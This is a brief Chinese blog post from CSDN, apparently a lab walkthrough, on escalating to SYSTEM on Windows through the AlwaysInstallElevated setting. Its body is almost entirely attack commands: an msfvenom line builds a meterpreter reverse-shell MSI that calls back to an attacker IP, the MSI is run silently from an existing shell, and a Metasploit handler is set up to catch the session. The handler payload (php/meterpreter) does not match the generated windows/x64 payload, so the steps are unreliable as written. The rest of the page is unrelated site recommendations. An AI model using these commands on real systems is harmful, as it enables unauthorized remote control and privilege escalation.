利用AlwaysInstalledElevated的漏洞提权

于 2021-08-14 09:59:25 发布
阅读量101 收藏
点赞数
分类专栏: 提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47156475/article/details/119685175
版权

提权我们可以利用AlwaysInstalledElevated的提权漏洞,
那么创建一个msi文件,命令如下:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.15.156 lport=5555 -f msi > shell.msi

在123.exe的shell中执行 execute -H -f shell.msi

再次开启一个新的端口监听:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 10.10.15.156
set lport 5555
exploit

然后可以得到一个连接,使用getuid可以得到sytem权限

weixin_47156475
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PathsAlwaysInstallElevated漏洞利用
MSB_WLAQ的博客
09-30 224
注册表键AlwaysInstallElevated 如果启用此策略设置项,那么任何权限的用户都能以NT AUTHORITY\SYSTEM权限来安装恶意的MSI(Micrisoft Windows Installer)文件。 1、PathsAlwaysInstallElevated漏洞产生的原因 原因是用户开启了Windows Installer特权安装功能。Windows Installer是Windows操作系统的组件之一,专门用来管理和配置软件服务,windows Installer除了是一个安装
关于Windows系统白名单程序(自动提权autoElevate)
ebxds的专栏
04-11 4378
参考资料: https://technet.microsoft.com/zh-cn/magazine/2009.07.uac.aspx http://withinwindows.com/blog/2009/02/05/list-of-windows-7-beta-build-7000-auto-elevated-binaries 工具: Strings.exe Sigcheck.exe
AlwaysInstallElevated提权介绍
bring_coco的博客
01-28 1338
介绍:AlwaysInstallElevated是注册表的一个键值,当其值为1时候,普通用户可以system权限安装MSI文件 一.判断AlwaysInstallElevated状态 1.通过PowerUp判断 可以使用PowerUP的Get-RegistryAlwaysInstallElevated模块来检查注册表项是否被设置,如果AlwaysInstallElevated注册表项被设置,意味着MSI文件是以SYSTEM权限运行的,True表示已经设置 命令:PowerShell -nop -exec b
注册表键AlwaysInstall提权
yangbz123的博客
05-23 672
目录漏洞描述1.1Windows install概述1.2注册表键AlwaysInstallElevated概述漏洞原因1、没有获取meterpreter的情况下2、获取meterpreter的情况下2.1msf提权2.1msi安装文件提权参考文献 漏洞描述 1.1Windows install概述 微软Windows Installer作为Win2K/WinXP/WinVista的组件之一,是专门用来管理和配置软件服务的工具。作为额外的产品提供,允许用户有效地安装与配置软件产品与应用程序。 Install
顶尖电子称条码秤LS系列称固件,最新固件,固件
08-28
顶尖电子称条码秤LS系列称固件,最新固件,固件
爬取淘宝热销(热门)咖啡商品信息数据集
08-28
本资源旨在收集淘宝平台上热销咖啡商品的相关信息,包括但不限于:店铺所在省份、城市位置、商品名称、销售价格、销量数据、单价(以人民币计)、付款人数、是否提供包邮服务、是否来自天猫平台以及满减优惠的详细信息。这些信息均来源于淘宝平台的公开透明数据,可供学习参考之用。请注意,本资源仅用于学术研究和个人学习目的,不得用于商业用途或其他非法活动。
爬取的淘宝新品推荐男装商品信息公开透明数据集
08-28
本资源专注于收集淘宝平台最新推荐的男装商品信息,内容涵盖商品的店铺所在省份、城市位置、商品的名称、销售价格、累积销量、单价(以人民币计价)、付款的顾客人数、是否提供包邮服务、是否为天猫平台的商品,以及相关的满减优惠情况。这些详细的数据点均来源于淘宝平台的公开透明信息,经过精确抓取和整理,旨在为分析电商平台上的新品推荐策略和消费者购买行为提供实用数据。 这些数据严格遵循淘宝平台的公开政策和隐私保护原则获取,确保了信息的合法性与合规性。然而,本资源仅作为学习参考之用,意在帮助研究人员、市场分析师或学生等理解电商领域的商品推荐机制、销售动态及市场趋势。 任何将此数据用于商业目的或其他未授权的活动都是不恰当的,甚至可能触犯相关法律条款。 在使用这些数据进行学术研究或个人学习时,用户应自觉遵守相关法律法规,尊重数据来源和版权,正确引用数据源,并不得用于任何形式的商业盈利。
STM32F4的环境配置,可直接运行STM32F4系列的芯片
08-28
STM32F4的环境配置,可直接运行STM32F4系列的芯片
技术资料PCB资料模拟电子技术资料03j.zip
08-28
技术资料PCB资料模拟电子技术资料03j.zip
全国大学生电子设计大赛项目合集射频无线资料雷达接收机灵敏度自动测试方案设计
08-28
全国大学生电子设计大赛项目合集射频无线资料雷达接收机灵敏度自动测试方案设计提取方式是百度网盘分享地址
da_1724814826825 (1)
08-28
da_1724814826825 (1)
单片机实现的超声波测距与显示模块.md
08-28
如何利用单片机实现超声波测距与显示模块,包括从硬件设计到软件编程的全方位内容。首先,介绍了超声波测距的基本原理,使用超声波模块(如HC-SR04)通过发射和接收超声波信号来测量距离,并通过公式计算距离。接着,阐述了单片机(如STC89C52、ATmega328)如何与超声波模块连接,以及电路设计细节。软件部分涵盖了如何编写单片机程序以触发超声波发射、测量回波时间,并计算距离。代码示例展示了如何使用计时器测量回波时间,并通过LCD显示距离。最后,文章还包括了调试与优化建议,如硬件连接检查、软件调试方法及性能优化策略,以确保系统的准确性和稳定性。
计算机软件著作权程序鉴别材料(源代码)提取器_extractor.zip
08-28
计算机软件著作权程序鉴别材料(源代码)提取器_extractor
PHD跟踪目标的准确性问题(解决方案).md
08-28
PHD跟踪目标的准确性问题(解决方案).md
全国大学生电子设计大赛项目合集射频无线资料射频阻抗匹配与史密斯圆图原理
08-28
全国大学生电子设计大赛项目合集射频无线资料射频阻抗匹配与史密斯圆图原理提取方式是百度网盘分享地址
ZCANPRO-Setup-V2.1.8(20201013).exe,周立功USB-CAN报文采集,分析工具
08-28
可使用周立功USB-CAN进行报文采集,报文分析
智能优化算法-蚁狮优化算法(ALO)
08-28
蚁狮优化算法 (Ant Lion Optimizer, ALO) 是一种基于群体智能的元启发式优化算法,它模拟了蚁狮(也称为蚁狮幼虫或蚁狮陷阱蛛)及其与蚂蚁之间的相互作用过程,用于解决复杂的优化问题。 ALO的工作机制主要包括以下几个方面: 陷阱构建:模拟蚁狮构建陷阱的行为,用于引导搜索方向。 蚂蚁行为:通过模拟蚂蚁在陷阱周围的移动,进行探索和开发。 精英学习:利用当前最优解的信息来指导搜索,提高解的质量。 优点包括: 强大的探索能力:ALO能够有效地探索解空间的不同区域。 灵活性:适用于多种优化问题,包括连续和离散优化。 快速收敛:通常能够在较少迭代次数内找到较好的解。 易于实现:算法设计直观,易于编程实现。
全国大学生电子设计大赛项目合集视频技术资料基于python的GTK与VTL混合编程及应用
08-28
全国大学生电子设计大赛项目合集视频技术资料基于python的GTK与VTL混合编程及应用提取方式是百度网盘分享地址
驾驭Docker容器中的信号:优雅停止的艺术
最新发布
08-28
Docker是一个开源的应用容器引擎,它允许开发者打包他们的应用以及应用的运行环境到一个可移植的容器中,然后发布到任何流行的Linux机器上,也可以实现虚拟化。容器是完全使用沙箱机制,相互之间不会有任何接口(类似iPhone的app),更重要的是容器性能开销极低。 ### Docker的主要特点包括: 1. **容器化**:Docker可以将应用及其依赖打包在轻量级、可移植的容器中,而不是传统的虚拟机。 2. **可移植性**:由于容器与底层基础设施无关,因此可以在任何安装了Docker的主机上运行。 3. **自动化部署**:Docker可以通过Dockerfile自动化构建容器镜像,简化部署流程。 4. **版本控制和组件重用**:Docker Hub和其他注册中心可以存储容器镜像,支持版本控制和重用。 5. **微服务架构**:Docker非常适合微服务架构,每个服务可以独立打包、部署和扩展。 6. **弹性伸缩**:容器可以快速启动和停止,适合实现应用的弹性伸缩。 7. **安全性**:容器提供了额外的隔离层,有助于提高应用的安全性。 8. **多租户架构**:Docker可以
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值